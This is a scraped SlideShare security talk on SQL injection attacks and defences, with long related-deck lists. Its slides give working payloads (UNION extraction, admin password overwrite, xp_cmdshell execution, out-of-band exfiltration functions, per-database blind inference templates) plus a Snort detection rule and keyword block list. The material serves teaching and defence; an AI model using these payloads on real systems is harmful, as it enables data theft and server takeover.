SlideShare une entreprise Scribd logo

Web application attacks using Sql injection and countermasures

Télécharger en tant que PPT, PDF
Cade Zvavanjanja
Cade Zvavanjanja

An advanced technical presentation on attacking Web applications using sql injection technique and the countermeasures.

Technologie
1  sur  49
SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Recommandé

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 

Recommandé

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Abhinav Nair
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
avishkarm
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 

Contenu connexe

Tendances

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 

Tendances (20)

Sql injection
Sql injectionSql injection
Sql injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 

En vedette

Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 

En vedette (16)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL Injection
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 

Similaire à Web application attacks using Sql injection and countermasures

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
badhanbd
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
Karen Lopez
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
ssuserde23af
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
webhostingguy
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
webhostingguy
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
DataWorks Summit
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
Jürgen Ambrosi
 

Similaire à Web application attacks using Sql injection and countermasures (20)

Sql
SqlSql
Sql
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbai
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServer
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data Leakeage
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 

Plus de Cade Zvavanjanja

Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
Cade Zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Cade Zvavanjanja
 

Plus de Cade Zvavanjanja (10)

Cade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security online
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf online
 
comesa cybersecurity
comesa cybersecuritycomesa cybersecurity
comesa cybersecurity
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreements
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT Security
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 services
 
Top online frauds 2010
Top online frauds 2010Top online frauds 2010
Top online frauds 2010
 

Dernier

Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Dernier (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
